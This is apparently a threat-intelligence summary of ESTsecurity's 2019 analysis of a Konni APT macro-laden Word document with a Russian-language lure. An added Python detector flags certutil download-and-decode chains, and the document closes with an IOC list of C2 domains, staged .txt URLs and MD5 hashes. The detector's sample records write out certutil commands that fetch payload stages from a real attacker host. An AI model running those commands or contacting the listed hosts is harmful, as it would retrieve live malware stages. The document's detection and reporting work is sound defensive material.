Konni APT group launches an attack disguised as a Russian document

2019-08-19, ESTsecurity (original title: 코니(Konni) APT 조직, 러시아 문서로 위장한 공격 등장)

https://blog.alyac.co.kr/2474


ESTsecurity's ESRC analyzed a malicious Word document from the Konni series. The file carries a Russian filename referring to the Korean Peninsula and US-DPRK dialogue, while internal code-page artifacts point to a Korean-language build environment. The document contains VBA macros and a payload hidden in the ObjectPool storage; when the macro runs, it launches certutil to download Base64-staged files from handicap.eu5[.]org and decode them, then selects a 32-bit or 64-bit DLL payload and retrieves attacker-controlled configuration. The staged files are served as plain .txt (1.txt through 4.txt in the IOC list), so the Base64 text on disk looks like a harmless text file until certutil decodes it. ESRC attributes the activity to Konni because the macro structure, the C2 logic hidden in ObjectPool and the staged CAB/DLL delivery closely match earlier samples, including a January 2019 Russian-language decoy document. The report lists the C2 and payload hosts handicap.eu5[.]org and clean.1apps[.]com together with MD5 hashes of the analyzed documents and payloads so that defenders can track Konni operations.
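The certutil download-then-decode chain above is the part of this tradecraft that is easiest to catch in process-creation telemetry, and the Base64 stage files are easy to triage once you know what certutil does with them. The following Python is an added example written for this summary, not code from the ESTsecurity report: it runs a small detector over constructed Sysmon-style process-creation records and emulates `certutil -decode` on a constructed stage file. The report does not quote the exact command lines, so the ones below are assumptions built from certutil's documented `-urlcache` and `-decode` switches; only the host name and the 1.txt file name come from the report's IOC list. Output paths, the benign control records and the fake CAB stage are all constructed.

```python
import base64
import os
import re

# Constructed process-creation records in Sysmon Event ID 1 style (not taken
# from the report). The certutil command lines are assumed reconstructions
# built from certutil's documented -urlcache and -decode switches; the host
# and 1.txt name come from the report's IOC list. Records 3 and 4 are benign
# controls: certificate verification and a download with no Office parent.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"cmd.exe /c certutil -urlcache -split -f http://handicap.eu5.org/1.txt C:\Users\Public\1.txt"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -decode C:\Users\Public\1.txt C:\Users\Public\1.cab"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -verify -urlfetch C:\certs\server.cer"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"certutil -urlcache -split -f https://updates.example.com/patch.cab patch.cab"},
]

OFFICE_IMAGES = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def certutil_findings(event):
    """Return the set of suspicious traits in one process-creation event.

    urlcache_download  certutil used as a downloader (-urlcache plus a URL)
    txt_stage          the remote file is served as .txt (Base64 text stage)
    decode             certutil used to Base64-decode a file on disk (-decode)
    office_parent      the direct parent is an Office application
    Note: the -decode step usually runs under cmd.exe, so tying it back to
    WINWORD.EXE needs the grandparent, which this simple check does not walk.
    """
    cmd = event["CommandLine"]
    if "certutil" not in cmd.lower():
        return set()
    tokens = [t.lower() for t in cmd.split()]
    found = set()
    url = URL_RE.search(cmd)
    if "-urlcache" in tokens and url:
        found.add("urlcache_download")
        if url.group(0).lower().endswith(".txt"):
            found.add("txt_stage")
    if "-decode" in tokens:
        found.add("decode")
    parent = os.path.basename(event["ParentImage"].replace("\\", "/")).upper()
    if parent in OFFICE_IMAGES:
        found.add("office_parent")
    return found


def is_konni_style_chain(events):
    """True when the records together show certutil fetching a .txt stage and
    decoding a file, the living-off-the-land sequence the report describes."""
    traits = set()
    for ev in events:
        traits |= certutil_findings(ev)
    return {"urlcache_download", "txt_stage", "decode"} <= traits


def decode_certutil_stage(text):
    """Emulate `certutil -decode` on a downloaded stage: drop PEM-style
    BEGIN/END lines and whitespace, Base64-decode the rest, and name the
    result by its magic bytes (CAB 'MSCF', PE 'MZ'). Simplification: real
    certutil also accepts hex dumps, which this does not handle."""
    body = "".join(line.strip() for line in text.splitlines()
                   if line.strip() and not line.startswith("-----"))
    data = base64.b64decode(body, validate=True)
    if data.startswith(b"MSCF"):
        kind = "CAB"
    elif data.startswith(b"MZ"):
        kind = "PE"
    else:
        kind = "unknown"
    return kind, data


# Constructed stand-in for a staged 1.txt: a Base64 CAB header wrapped in
# certificate delimiters so it passes as a certificate file on casual inspection.
FAKE_STAGE_TXT = ("-----BEGIN CERTIFICATE-----\n"
                  + base64.b64encode(b"MSCF" + b"\x00" * 32).decode()
                  + "\n-----END CERTIFICATE-----\n")


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(sorted(certutil_findings(ev)), "<-", ev["CommandLine"])
    print("Konni-style certutil chain:", is_konni_style_chain(SAMPLE_EVENTS))
    print("Decoded stage type:", decode_certutil_stage(FAKE_STAGE_TXT)[0])
```

The benign controls matter: `certutil -verify -urlfetch` and a plain download under explorer.exe both touch the network legitimately, so alert on the combination (Office parent, `.txt` fetched by `-urlcache`, followed by `-decode`) rather than on the certutil image alone.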

Indicators of Compromise

Type         Value                               First Seen   Last Seen
DOMAIN       handicap.eu5.org                    2019-08-19   2020-01-23
URL          http://handicap.eu5.org/1.txt       2019-08-19   2020-01-05
DOMAIN       clean.1apps.com                     2019-05-24   2020-01-05
DOMAIN       ftpupload.net                       2019-05-24   2020-01-05
DOMAIN       1apps.com                           2018-11-29   2020-01-05
HASH (MD5)   c313a3aca90a614dd0ff6ce28c6ae2f0    2019-08-19   2019-08-19
HASH (MD5)   660a640e702606341ab0d42724380322    2019-08-19   2019-08-19
URL          http://clean.1apps.com/3.txt        2019-08-19   2019-08-19
URL          http://handicap.eu5.org/2.txt       2019-08-19   2019-08-19
URL          http://clean.1apps.com/2.txt        2019-08-19   2019-08-19
URL          http://handicap.eu5.org/4.txt       2019-08-19   2019-08-19
URL          http://handicap.eu5.org/3.txt       2019-08-19   2019-08-19
HASH (MD5)   68b080cdc748e9357e75a65fba30eaa7    2019-05-24   2019-08-19
URL          http://clean.1apps.com/4.txt        2019-05-24   2019-08-19
URL          http://clean.1apps.com/1.txt        2019-05-24   2019-08-19

The .txt URLs are the Base64-staged payload files that the macro's certutil command fetches; the hashes are MD5 values for the analyzed documents and payloads.
